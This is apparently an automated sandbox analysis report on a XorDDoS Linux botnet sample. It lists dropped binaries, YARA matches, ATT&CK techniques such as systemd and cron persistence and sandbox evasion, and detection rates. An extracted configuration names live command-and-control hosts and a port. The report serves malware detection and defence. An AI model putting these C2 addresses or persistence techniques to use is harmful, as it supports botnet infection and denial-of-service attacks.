Source: /usr/bin/otlzwyqefc (PID: 6401)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6404)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6406)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6409)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/otlzwyqefc (PID: 6411)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6418)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6421)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6423)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6426)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/dthtwwmqvu (PID: 6429)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6436)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6439)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6441)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6444)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/jeyjdycnpv (PID: 6447)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6453)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6456)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6458)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6461)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/wutujskjnm (PID: 6464)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6472)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6475)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6477)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6481)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/qxzsiorokf (PID: 6483)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6489)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6492)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6494)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6497)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uzqdvpyngy (PID: 6500)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6506)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6509)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6512)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6514)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bgoiqqymph (PID: 6517)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6526)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6529)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6531)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6534)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uhjkqkcgma (PID: 6537)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6543)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6546)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6548)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6551)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/ksagqhmoao (PID: 6553)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6560)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6563)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6565)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6568)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/snluqxjnyb (PID: 6571)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6577)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6580)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6583)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6585)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/rfdcbxuezd (PID: 6588)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6594)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6597)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6599)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6602)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/nqjbkvhncc (PID: 6604)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6612)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6614)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6616)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6619)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/xzmsvqaqiz (PID: 6622)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6630)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6632)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6634)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6637)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/bbdupdfrbl (PID: 6640)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6647)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6650)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6652)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6655)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/lqmgtequuz (PID: 6657)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6666)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6668)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6671)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6673)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/vzezokfask (PID: 6676)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/skjzlhozvl (PID: 6683)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/skjzlhozvl (PID: 6685)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/skjzlhozvl (PID: 6687)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/skjzlhozvl (PID: 6690)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/skjzlhozvl (PID: 6692)	Queries kernel information via 'uname':	Jump to behavior

Remote Access Functionality

Yara detected XorDDoS Bot

Source: Yara match	File source: UDMp3dZ7nc.elf, type: SAMPLE
Source: Yara match	File source: 6455.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6381.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6262.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6296.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6260.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6552.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6400.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6513.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6516.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6408.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6474.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6293.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6476.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6262, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6264, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6293, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6311, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6314, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6319, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6322, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6331, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6333, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6335, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6338, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6367, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6381, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6386, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6394, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6403, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6405, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6410, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6417, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6422, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6425, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6438, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6443, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6446, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6455, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6457, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6463, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6471, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6474, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6491, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6493, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6498, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6505, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6510, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6513, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UDMp3dZ7nc.elf PID: 6516, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/sosfbbrzmx, type: DROPPED
Source: Yara match	File source: /usr/bin/uhjkqkcgma, type: DROPPED
Source: Yara match	File source: /usr/bin/vnihfmehfy, type: DROPPED
Source: Yara match	File source: /usr/bin/oigyzaiygp, type: DROPPED
Source: Yara match	File source: /usr/bin/otlzwyqefc, type: DROPPED
Source: Yara match	File source: /usr/bin/ksagqhmoao, type: DROPPED
Source: Yara match	File source: /usr/bin/eqoogeqyds, type: DROPPED
Source: Yara match	File source: /usr/bin/wutujskjnm, type: DROPPED
Source: Yara match	File source: /usr/bin/qxzsiorokf, type: DROPPED
Source: Yara match	File source: /usr/bin/gphlkawhxw, type: DROPPED
Source: Yara match	File source: /usr/bin/uzqdvpyngy, type: DROPPED
Source: Yara match	File source: /usr/lib/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/snluqxjnyb, type: DROPPED
Source: Yara match	File source: /usr/bin/jeyjdycnpv, type: DROPPED
Source: Yara match	File source: /usr/bin/bgoiqqymph, type: DROPPED
Source: Yara match	File source: /usr/bin/dthtwwmqvu, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	11 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

Threatname: XorDDoS

{"C2 list": ["http://aa.hostasa.org/config.rar\u0000tat456.com:1522", "ppp.gggatat456.com:1522"]}

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
UDMp3dZ7nc.elf	66%	Virustotal		Browse
UDMp3dZ7nc.elf	68%	ReversingLabs	Linux.Network.Xor
UDMp3dZ7nc.elf	100%	Avira	TR/ELF.DDoS.Xor.b
UDMp3dZ7nc.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/usr/lib/libudev.so	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/bgoiqqymph	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/dthtwwmqvu	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/eqoogeqyds	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/otlzwyqefc	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/vnihfmehfy	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/ksagqhmoao	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/oigyzaiygp	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/sosfbbrzmx	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/qxzsiorokf	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/uhjkqkcgma	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/uzqdvpyngy	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/snluqxjnyb	100%	Avira	LINUX/Xorddos.misjj
/usr/bin/gphlkawhxw	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/jeyjdycnpv	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/bin/wutujskjnm	100%	Avira	TR/ELF.DDoS.Xor.b
/usr/lib/libudev.so	100%	Joe Sandbox ML
/usr/bin/bgoiqqymph	100%	Joe Sandbox ML
/usr/bin/dthtwwmqvu	100%	Joe Sandbox ML
/usr/bin/eqoogeqyds	100%	Joe Sandbox ML
/usr/bin/otlzwyqefc	100%	Joe Sandbox ML
/usr/bin/vnihfmehfy	100%	Joe Sandbox ML
/usr/bin/ksagqhmoao	100%	Joe Sandbox ML
/usr/bin/oigyzaiygp	100%	Joe Sandbox ML
/usr/bin/sosfbbrzmx	100%	Joe Sandbox ML
/usr/bin/qxzsiorokf	100%	Joe Sandbox ML
/usr/bin/uhjkqkcgma	100%	Joe Sandbox ML
/usr/bin/uzqdvpyngy	100%	Joe Sandbox ML
/usr/bin/snluqxjnyb	100%	Joe Sandbox ML
/usr/bin/gphlkawhxw	100%	Joe Sandbox ML
/usr/bin/jeyjdycnpv	100%	Joe Sandbox ML
/usr/bin/wutujskjnm	100%	Joe Sandbox ML
/etc/cron.hourly/gcc.sh	42%	ReversingLabs	Linux.Network.Xor
/usr/bin/snluqxjnyb	46%	ReversingLabs	Linux.Network.Xor
/usr/lib/libudev.so	68%	ReversingLabs	Linux.Network.Xor

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://aa.hostasa.org/config.rar	100%	Avira URL Cloud	malware
http://aa.hostasa.org/config.rartat456.com:1522	100%	Avira URL Cloud	malware
ppp.gggatat456.com:1522	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ppp.gggatat456.com	137.175.90.213	true	true		unknown
aa.hostasa.org	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://aa.hostasa.org/config.rartat456.com:1522	true	Avira URL Cloud: malware	unknown
ppp.gggatat456.com:1522	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
